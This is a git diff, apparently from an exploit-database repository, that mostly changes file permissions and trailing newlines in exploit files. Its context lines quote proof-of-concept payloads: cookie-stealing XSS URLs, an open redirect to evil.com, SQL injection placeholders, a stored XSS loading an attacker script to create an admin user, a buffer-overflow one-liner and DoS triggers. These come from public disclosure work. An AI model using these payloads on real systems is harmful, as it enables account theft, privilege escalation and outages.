arbitrary script code in the br http://www.example.com/path/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E -http://www.example.com/path/tagcloud-ru.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E \ No newline at end of file +http://www.example.com/path/tagcloud-ru.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/35237.txt b/platforms/multiple/webapps/35237.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35238.txt b/platforms/multiple/webapps/35238.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35248.txt b/platforms/multiple/webapps/35248.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35623.txt b/platforms/multiple/webapps/35623.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35743.txt b/platforms/multiple/webapps/35743.txt old mode 100755 new mode 100644 index 6e6d55a11..8dab38b03 --- a/platforms/multiple/webapps/35743.txt +++ b/platforms/multiple/webapps/35743.txt @@ -11,4 +11,4 @@ MT-Cumulus 1.02 and prior versions http://www.example.com/scripts/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E -http://www.example.com/mt/mt-static/plugins/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E \ No newline at end of file +http://www.example.com/mt/mt-static/plugins/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/35786.txt b/platforms/multiple/webapps/35786.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35908.txt b/platforms/multiple/webapps/35908.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35911.txt b/platforms/multiple/webapps/35911.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35915.txt b/platforms/multiple/webapps/35915.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35941.txt b/platforms/multiple/webapps/35941.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35980.html b/platforms/multiple/webapps/35980.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/36126.txt b/platforms/multiple/webapps/36126.txt old mode 100755 new mode 100644 index fe89943f7..546708ef3 --- a/platforms/multiple/webapps/36126.txt +++ b/platforms/multiple/webapps/36126.txt @@ -129,4 +129,4 @@ Configuration: Default VIII. Credits ======================================================== Discovered by Rehan Ahmed - knight_rehan@hotmail.com \ No newline at end of file + knight_rehan@hotmail.com \ No newline at end of file diff --git a/platforms/multiple/webapps/36419.txt b/platforms/multiple/webapps/36419.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/36609.txt b/platforms/multiple/webapps/36609.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/36794.txt b/platforms/multiple/webapps/36794.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/36930.txt b/platforms/multiple/webapps/36930.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/37058.txt b/platforms/multiple/webapps/37058.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/37271.txt b/platforms/multiple/webapps/37271.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/37322.txt b/platforms/multiple/webapps/37322.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/37325.txt b/platforms/multiple/webapps/37325.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/37394.txt b/platforms/multiple/webapps/37394.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/37470.txt b/platforms/multiple/webapps/37470.txt old mode 100755 new mode 100644 index ec79a5399..d5f9b5375 --- a/platforms/multiple/webapps/37470.txt +++ b/platforms/multiple/webapps/37470.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SWFUpload 2.2.0.1 is vulnerable; prior versions may also be affected. -http://www.example.com/v220/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;// \ No newline at end of file +http://www.example.com/v220/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;// \ No newline at end of file diff --git a/platforms/multiple/webapps/37569.txt b/platforms/multiple/webapps/37569.txt old mode 100755 new mode 100644 index f01930850..8db9505ee --- a/platforms/multiple/webapps/37569.txt +++ b/platforms/multiple/webapps/37569.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ntop 4.0.3 is vulnerable; other versions may also be affected. -http://www.example.com/plugins/rrdPlugin?action=arbreq&which=graph&arbfile=TEST">[XSS]&arbiface=eth0&start=1343344529&end=1343348129&counter=&title=Active+End+Nodes&mode=zoom \ No newline at end of file +http://www.example.com/plugins/rrdPlugin?action=arbreq&which=graph&arbfile=TEST">[XSS]&arbiface=eth0&start=1343344529&end=1343348129&counter=&title=Active+End+Nodes&mode=zoom \ No newline at end of file diff --git a/platforms/multiple/webapps/37571.txt b/platforms/multiple/webapps/37571.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/37573.txt b/platforms/multiple/webapps/37573.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/37662.txt b/platforms/multiple/webapps/37662.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/37686.txt b/platforms/multiple/webapps/37686.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/37700.txt b/platforms/multiple/webapps/37700.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/37757.py b/platforms/multiple/webapps/37757.py index 0b73dec03..6c98aea2a 100755 --- a/platforms/multiple/webapps/37757.py +++ b/platforms/multiple/webapps/37757.py @@ -63,4 +63,4 @@ def main(): print "An error occured, maybe a premission error" if __name__ == '__main__': - main() \ No newline at end of file + main() \ No newline at end of file diff --git a/platforms/multiple/webapps/37765.txt b/platforms/multiple/webapps/37765.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/37767.txt b/platforms/multiple/webapps/37767.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/37791.txt b/platforms/multiple/webapps/37791.txt old mode 100755 new mode 100644 index 2c9f1525d..8eeaeb379 --- a/platforms/multiple/webapps/37791.txt +++ b/platforms/multiple/webapps/37791.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Atlassian Confluence versions prior to 4.1.9 are vulnerable. - http://www.example.com/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm \ No newline at end of file + http://www.example.com/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm \ No newline at end of file diff --git a/platforms/multiple/webapps/37816.txt b/platforms/multiple/webapps/37816.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/38016.txt b/platforms/multiple/webapps/38016.txt old mode 100755 new mode 100644 index dace94563..0b863ff2d --- a/platforms/multiple/webapps/38016.txt +++ b/platforms/multiple/webapps/38016.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc ESRI ArcGIS for Server 10.1 is vulnerable; other versions may also be affected. -http://www.example.com:6080/arcgis/rest/services//query?f=json&where=featured%3Dtrue&returnGeometry=true&spatialRel=esriSpatialRelIntersects \ No newline at end of file +http://www.example.com:6080/arcgis/rest/services//query?f=json&where=featured%3Dtrue&returnGeometry=true&spatialRel=esriSpatialRelIntersects \ No newline at end of file diff --git a/platforms/multiple/webapps/38062.txt b/platforms/multiple/webapps/38062.txt old mode 100755 new mode 100644 index 61ef5add3..64cd2030a --- a/platforms/multiple/webapps/38062.txt +++ b/platforms/multiple/webapps/38062.txt @@ -6,4 +6,4 @@ A successful exploit may aid in phishing attacks; other attacks are possible. Forescout CounterACT 6.3.4.1 is vulnerable; other versions may also be affected. -http://www.example.com/assets/login?a=http://www.evil.com \ No newline at end of file +http://www.example.com/assets/login?a=http://www.evil.com \ No newline at end of file diff --git a/platforms/multiple/webapps/38173.txt b/platforms/multiple/webapps/38173.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/38174.txt b/platforms/multiple/webapps/38174.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/38424.txt b/platforms/multiple/webapps/38424.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/38463.txt b/platforms/multiple/webapps/38463.txt old mode 100755 new mode 100644 index 5bb409f23..28c9dc7ab --- a/platforms/multiple/webapps/38463.txt +++ b/platforms/multiple/webapps/38463.txt @@ -4,4 +4,4 @@ Aibolit is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. - http://www.example.com/AI-BOLIT-REPORT-<date>-< time>.html \ No newline at end of file + http://www.example.com/AI-BOLIT-REPORT-<date>-< time>.html \ No newline at end of file diff --git a/platforms/multiple/webapps/38706.txt b/platforms/multiple/webapps/38706.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/38836.txt b/platforms/multiple/webapps/38836.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/39235.txt b/platforms/multiple/webapps/39235.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/39288.txt b/platforms/multiple/webapps/39288.txt old mode 100755 new mode 100644 index 9df39e20d..0e8288236 --- a/platforms/multiple/webapps/39288.txt +++ b/platforms/multiple/webapps/39288.txt @@ -10,4 +10,4 @@ ManageEngine Password Manager Pro 5 through 7 build 7003 ManageEngine IT360 8 through 10.1.1 build 10110 www.example.com/MetadataServlet.dat?sv=[SQLi] -www.example.com/console/MetadataServlet.dat?sv=[SQLi] \ No newline at end of file +www.example.com/console/MetadataServlet.dat?sv=[SQLi] \ No newline at end of file diff --git a/platforms/multiple/webapps/39382.txt b/platforms/multiple/webapps/39382.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/39394.txt b/platforms/multiple/webapps/39394.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/39399.txt b/platforms/multiple/webapps/39399.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/39419.txt b/platforms/multiple/webapps/39419.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/39435.txt b/platforms/multiple/webapps/39435.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/39441.txt b/platforms/multiple/webapps/39441.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/39449.txt b/platforms/multiple/webapps/39449.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/39450.txt b/platforms/multiple/webapps/39450.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/39597.txt b/platforms/multiple/webapps/39597.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/39626.txt b/platforms/multiple/webapps/39626.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/39738.html b/platforms/multiple/webapps/39738.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/40133.html b/platforms/multiple/webapps/40133.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/40134.html b/platforms/multiple/webapps/40134.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/40135.txt b/platforms/multiple/webapps/40135.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41451.html b/platforms/multiple/webapps/41451.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41453.html b/platforms/multiple/webapps/41453.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41554.html b/platforms/multiple/webapps/41554.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41779.txt b/platforms/multiple/webapps/41779.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41799.html b/platforms/multiple/webapps/41799.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41800.html b/platforms/multiple/webapps/41800.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41801.html b/platforms/multiple/webapps/41801.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41802.html b/platforms/multiple/webapps/41802.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41803.html b/platforms/multiple/webapps/41803.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41865.html b/platforms/multiple/webapps/41865.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41866.html b/platforms/multiple/webapps/41866.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41877.txt b/platforms/multiple/webapps/41877.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41881.html b/platforms/multiple/webapps/41881.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41882.html b/platforms/multiple/webapps/41882.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41899.html b/platforms/multiple/webapps/41899.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41900.html b/platforms/multiple/webapps/41900.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41927.txt b/platforms/multiple/webapps/41927.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41946.txt b/platforms/multiple/webapps/41946.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41947.txt b/platforms/multiple/webapps/41947.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/41948.txt b/platforms/multiple/webapps/41948.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/42064.html b/platforms/multiple/webapps/42064.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/42065.html b/platforms/multiple/webapps/42065.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/42066.txt b/platforms/multiple/webapps/42066.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/42067.html b/platforms/multiple/webapps/42067.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/42068.html b/platforms/multiple/webapps/42068.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/42069.html b/platforms/multiple/webapps/42069.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/42090.txt b/platforms/multiple/webapps/42090.txt old mode 100755 new mode 100644 index 4bfbdf96b..e789f131e --- a/platforms/multiple/webapps/42090.txt +++ b/platforms/multiple/webapps/42090.txt @@ -56,4 +56,4 @@ ssh \<script \ src\=\"http\&\#x3A\;\/\/10\.0\.8\.130\/kemp\_attack\.js\"\>\ </sc 5 – Check again the log page (View Audit LogFile): this will activate the script -6 – Check again the User Management page: a new user as been created with all permissions. \ No newline at end of file +6 – Check again the User Management page: a new user as been created with all permissions. \ No newline at end of file diff --git a/platforms/multiple/webapps/42105.html b/platforms/multiple/webapps/42105.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/42106.html b/platforms/multiple/webapps/42106.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/42107.html b/platforms/multiple/webapps/42107.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/42335.txt b/platforms/multiple/webapps/42335.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/42378.html b/platforms/multiple/webapps/42378.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/42610.txt b/platforms/multiple/webapps/42610.txt old mode 100755 new mode 100644 index 45ef6580a..2b4835292 --- a/platforms/multiple/webapps/42610.txt +++ b/platforms/multiple/webapps/42610.txt @@ -311,6 +311,4 @@ of vulnerability-lab team & the specific authors or managers. To record, list, m -- VULNERABILITY LABORATORY - RESEARCH TEAM -SERVICE: www.vulnerability-lab.com - - +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/platforms/multiple/webapps/42613.txt b/platforms/multiple/webapps/42613.txt old mode 100755 new mode 100644 index be312a85b..c7d7616b4 --- a/platforms/multiple/webapps/42613.txt +++ b/platforms/multiple/webapps/42613.txt @@ -24,4 +24,4 @@ It's less damaging than a traditional "hack back" but is sure to irritate the lo 3. Symantec Security Bulletin -https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00 +https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00 \ No newline at end of file diff --git a/platforms/multiple/webapps/43002.py b/platforms/multiple/webapps/43002.py index d69444bb5..e46bd4803 100755 --- a/platforms/multiple/webapps/43002.py +++ b/platforms/multiple/webapps/43002.py @@ -239,4 +239,4 @@ def end_tran(session, commit=False): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/platforms/multiple/webapps/43003.py b/platforms/multiple/webapps/43003.py index 4ae7d5356..9261796b9 100755 --- a/platforms/multiple/webapps/43003.py +++ b/platforms/multiple/webapps/43003.py @@ -168,4 +168,4 @@ def is_super_user(session): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/platforms/multiple/webapps/43004.py b/platforms/multiple/webapps/43004.py index d4e333527..49cf008e5 100755 --- a/platforms/multiple/webapps/43004.py +++ b/platforms/multiple/webapps/43004.py @@ -283,4 +283,4 @@ def is_super_user(session): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/platforms/multiple/webapps/43005.py b/platforms/multiple/webapps/43005.py index e5dfe9e88..2f48c0856 100755 --- a/platforms/multiple/webapps/43005.py +++ b/platforms/multiple/webapps/43005.py @@ -151,4 +151,4 @@ def is_super_user(session): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/platforms/multiple/webapps/43024.txt b/platforms/multiple/webapps/43024.txt old mode 100755 new mode 100644 index daeb22ebd..0df4ce90e --- a/platforms/multiple/webapps/43024.txt +++ b/platforms/multiple/webapps/43024.txt @@ -40,4 +40,4 @@ Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: Squeezebox-expandPlayerControl=true; Squeezebox-expanded-MY_MUSIC=0; Squeezebox-expanded-RADIO=0; Squeezebox-expanded-PLUGIN_MY_APPS_MODULE_NAME=0; Squeezebox-expanded-FAVORITES=0; Squeezebox-expanded-PLUGINS=0 Connection: close -Upgrade-Insecure-Requests: 1 +Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/platforms/multiple/webapps/43122.txt b/platforms/multiple/webapps/43122.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/43123.txt b/platforms/multiple/webapps/43123.txt old mode 100755 new mode 100644 index 51f743ec1..ec5557d39 --- a/platforms/multiple/webapps/43123.txt +++ b/platforms/multiple/webapps/43123.txt @@ -15,4 +15,4 @@ POC: 2. Add script as the value of the field. 3. Payload : <script> alert(1)</script> 4. Script saved and gives an image msg with a javascript execution on image click. -5. Therefore, Persistent XSS. +5. Therefore, Persistent XSS. \ No newline at end of file diff --git a/platforms/multiple/webapps/9714.txt b/platforms/multiple/webapps/9714.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9715.txt b/platforms/multiple/webapps/9715.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9716.txt b/platforms/multiple/webapps/9716.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9719.txt b/platforms/multiple/webapps/9719.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9720.txt b/platforms/multiple/webapps/9720.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9721.txt b/platforms/multiple/webapps/9721.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9722.txt b/platforms/multiple/webapps/9722.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9723.txt b/platforms/multiple/webapps/9723.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9724.txt b/platforms/multiple/webapps/9724.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9727.txt b/platforms/multiple/webapps/9727.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9728.txt b/platforms/multiple/webapps/9728.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9729.txt b/platforms/multiple/webapps/9729.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9730.txt b/platforms/multiple/webapps/9730.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9732.txt b/platforms/multiple/webapps/9732.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9819.txt b/platforms/multiple/webapps/9819.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9872.txt b/platforms/multiple/webapps/9872.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/9898.txt b/platforms/multiple/webapps/9898.txt old mode 100755 new mode 100644 diff --git a/platforms/netbsd_x86/dos/12653.sh b/platforms/netbsd_x86/dos/12653.sh index be1fb4468..040121a14 100755 --- a/platforms/netbsd_x86/dos/12653.sh +++ b/platforms/netbsd_x86/dos/12653.sh @@ -16,4 +16,4 @@ # CVE: Not available. See NetBSD-SA2009-007 # Code: -export PATH=`/usr/pkg/bin/perl -e 'printf("A"x1000);printf("\x41\xb0\xe5\xbf\xbf"x15);'`:/bin:/usr/bin:/usr/sbin:/sbin:/usr/games && hack \ No newline at end of file +export PATH=`/usr/pkg/bin/perl -e 'printf("A"x1000);printf("\x41\xb0\xe5\xbf\xbf"x15);'`:/bin:/usr/bin:/usr/sbin:/sbin:/usr/games && hack \ No newline at end of file diff --git a/platforms/netbsd_x86/dos/42272.c b/platforms/netbsd_x86/dos/42272.c old mode 100755 new mode 100644 diff --git a/platforms/netbsd_x86/local/19261.txt b/platforms/netbsd_x86/local/19261.txt old mode 100755 new mode 100644 diff --git a/platforms/netbsd_x86/remote/21364.txt b/platforms/netbsd_x86/remote/21364.txt old mode 100755 new mode 100644 diff --git a/platforms/netbsd_x86/shellcode/13470.c b/platforms/netbsd_x86/shellcode/13470.c old mode 100755 new mode 100644 diff --git a/platforms/netbsd_x86/shellcode/13471.c b/platforms/netbsd_x86/shellcode/13471.c old mode 100755 new mode 100644 diff --git a/platforms/netbsd_x86/shellcode/13472.c b/platforms/netbsd_x86/shellcode/13472.c old mode 100755 new mode 100644 diff --git a/platforms/netbsd_x86/shellcode/13473.c b/platforms/netbsd_x86/shellcode/13473.c old mode 100755 new mode 100644 diff --git a/platforms/netbsd_x86/shellcode/13474.txt b/platforms/netbsd_x86/shellcode/13474.txt old mode 100755 new mode 100644 diff --git a/platforms/netware/dos/17298.txt b/platforms/netware/dos/17298.txt old mode 100755 new mode 100644 diff --git a/platforms/netware/dos/18327.txt b/platforms/netware/dos/18327.txt old mode 100755 new mode 100644 diff --git a/platforms/netware/dos/18328.txt b/platforms/netware/dos/18328.txt old mode 100755 new mode 100644 diff --git a/platforms/netware/dos/18351.txt b/platforms/netware/dos/18351.txt old mode 100755 new mode 100644 diff --git a/platforms/netware/dos/22949.txt b/platforms/netware/dos/22949.txt old mode 100755 new mode 100644 diff --git a/platforms/netware/local/19364.txt b/platforms/netware/local/19364.txt old mode 100755 new mode 100644 diff --git a/platforms/netware/remote/19365.txt b/platforms/netware/remote/19365.txt old mode 100755 new mode 100644 index 40bedd236..54f13970c --- a/platforms/netware/remote/19365.txt +++ b/platforms/netware/remote/19365.txt @@ -7,4 +7,4 @@ CX /T /A /R - list all readable user and container object names in tree, and can NLIST USER /D - list info regarding user names in current context NLIST GROUPS /D - list groups and group membership in current context NLIST SERVER /D - list server names and OS versions, and if attached reveal if accounting is installed or not -NLIST /OT=* /DYN /D - list all readable objects, including dynamic objects, names of NDS trees, etc \ No newline at end of file +NLIST /OT=* /DYN /D - list all readable objects, including dynamic objects, names of NDS trees, etc \ No newline at end of file diff --git a/platforms/netware/remote/23586.txt b/platforms/netware/remote/23586.txt old mode 100755 new mode 100644 index 44b2392f4..64716c643 --- a/platforms/netware/remote/23586.txt +++ b/platforms/netware/remote/23586.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9479/info Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server. -http://www.example.com/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas \ No newline at end of file +http://www.example.com/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas \ No newline at end of file diff --git a/platforms/netware/remote/23587.txt b/platforms/netware/remote/23587.txt old mode 100755 new mode 100644 diff --git a/platforms/netware/remote/23588.txt b/platforms/netware/remote/23588.txt old mode 100755 new mode 100644 diff --git a/platforms/netware/remote/23589.txt b/platforms/netware/remote/23589.txt old mode 100755 new mode 100644 diff --git a/platforms/nodejs/webapps/43053.txt b/platforms/nodejs/webapps/43053.txt old mode 100755 new mode 100644 index 9b46992ce..ecacc5986 --- a/platforms/nodejs/webapps/43053.txt +++ b/platforms/nodejs/webapps/43053.txt @@ -46,4 +46,4 @@ https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf -- Best Regards, Ishaq Mohammed -https://about.me/security-prince +https://about.me/security-prince \ No newline at end of file diff --git a/platforms/nodejs/webapps/43054.txt b/platforms/nodejs/webapps/43054.txt old mode 100755 new mode 100644 index 5dbb2b70f..c41a282f7 --- a/platforms/nodejs/webapps/43054.txt +++ b/platforms/nodejs/webapps/43054.txt @@ -42,5 +42,4 @@ https://github.com/keystonejs/keystone/pull/4478/commits/5cb6405dfc0b6d59003c996 Reference: https://github.com/keystonejs/keystone/pull/4478 -https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf - +https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf \ No newline at end of file diff --git a/platforms/novell/dos/13906.txt b/platforms/novell/dos/13906.txt old mode 100755 new mode 100644 index d924c485e..30fd30bdf --- a/platforms/novell/dos/13906.txt +++ b/platforms/novell/dos/13906.txt @@ -132,4 +132,4 @@ now one of the leading independent information security companies in the Australasian and SE-Asian region, with offices throughout Australia and in Singapore and Malaysia. -For more information, please visit our website at http://www.stratsec.net/ \ No newline at end of file +For more information, please visit our website at http://www.stratsec.net/ \ No newline at end of file diff --git a/platforms/novell/dos/14010.txt b/platforms/novell/dos/14010.txt old mode 100755 new mode 100644 diff --git a/platforms/novell/dos/14866.txt b/platforms/novell/dos/14866.txt old mode 100755 new mode 100644 diff --git a/platforms/novell/dos/14928.py b/platforms/novell/dos/14928.py index 1e979a1d7..7d1679c03 100755 --- a/platforms/novell/dos/14928.py +++ b/platforms/novell/dos/14928.py @@ -34,9 +34,4 @@ try: ftp.voidcmd('DELE ' + buffer) except Exception,err: - print err - - - - - \ No newline at end of file + print err \ No newline at end of file diff --git a/platforms/novell/dos/19541.txt b/platforms/novell/dos/19541.txt old mode 100755 new mode 100644 index 57703274e..7abc338c2 --- a/platforms/novell/dos/19541.txt +++ b/platforms/novell/dos/19541.txt @@ -4,4 +4,4 @@ source: http://www.securityfocus.com/bid/700/info Novell client versions 3.0 and 3.01 for Windows platforms are vulnerable to a remotely exploitable vulnerability which could cause a denial of service. The client opens a listening tcp socket on port 427, to which if a SYN is sent, results in the machine locking with a "blue screen" error. The only solution from that point is to reset the affected computer. -nmap -sS -p 427 <target> \ No newline at end of file +nmap -sS -p 427 <target> \ No newline at end of file diff --git a/platforms/novell/dos/19744.txt b/platforms/novell/dos/19744.txt old mode 100755 new mode 100644 index 0e022d193..c9fdc7101 --- a/platforms/novell/dos/19744.txt +++ b/platforms/novell/dos/19744.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/972/info By requesting a long URL from a Novell Groupwise 5.5 webserver with the Enhancement Pack installed, it is possible to cause the server to abend, the Java.nlm to take up all available CPU resource, or to stop the post office service. The server will need to be rebooted to restore normal operation. -http ://target/servlet/long string of 200+ characters \ No newline at end of file +http ://target/servlet/long string of 200+ characters \ No newline at end of file diff --git a/platforms/novell/dos/19746.txt b/platforms/novell/dos/19746.txt old mode 100755 new mode 100644 index d1dbb8de3..8ad94409d --- a/platforms/novell/dos/19746.txt +++ b/platforms/novell/dos/19746.txt @@ -6,4 +6,4 @@ The CS Audit Trail Proxy is handled by CSATPRX.NLM telnet target:2000 <enter> -<enter> \ No newline at end of file +<enter> \ No newline at end of file diff --git a/platforms/novell/dos/20072.txt b/platforms/novell/dos/20072.txt old mode 100755 new mode 100644 diff --git a/platforms/novell/dos/22749.txt b/platforms/novell/dos/22749.txt old mode 100755 new mode 100644 index cd0663334..4e2deff9f --- a/platforms/novell/dos/22749.txt +++ b/platforms/novell/dos/22749.txt @@ -10,4 +10,4 @@ Transfer-Encoding:Chunked (Enter) (Enter) AAAAAAAA (Enter) -(Enter) \ No newline at end of file +(Enter) \ No newline at end of file diff --git a/platforms/novell/dos/264.c b/platforms/novell/dos/264.c old mode 100755 new mode 100644 diff --git a/platforms/novell/dos/31710.txt b/platforms/novell/dos/31710.txt old mode 100755 new mode 100644 diff --git a/platforms/novell/dos/33183.html b/platforms/novell/dos/33183.html old mode 100755 new mode 100644 index bd950f02a..584263490 --- a/platforms/novell/dos/33183.html +++ 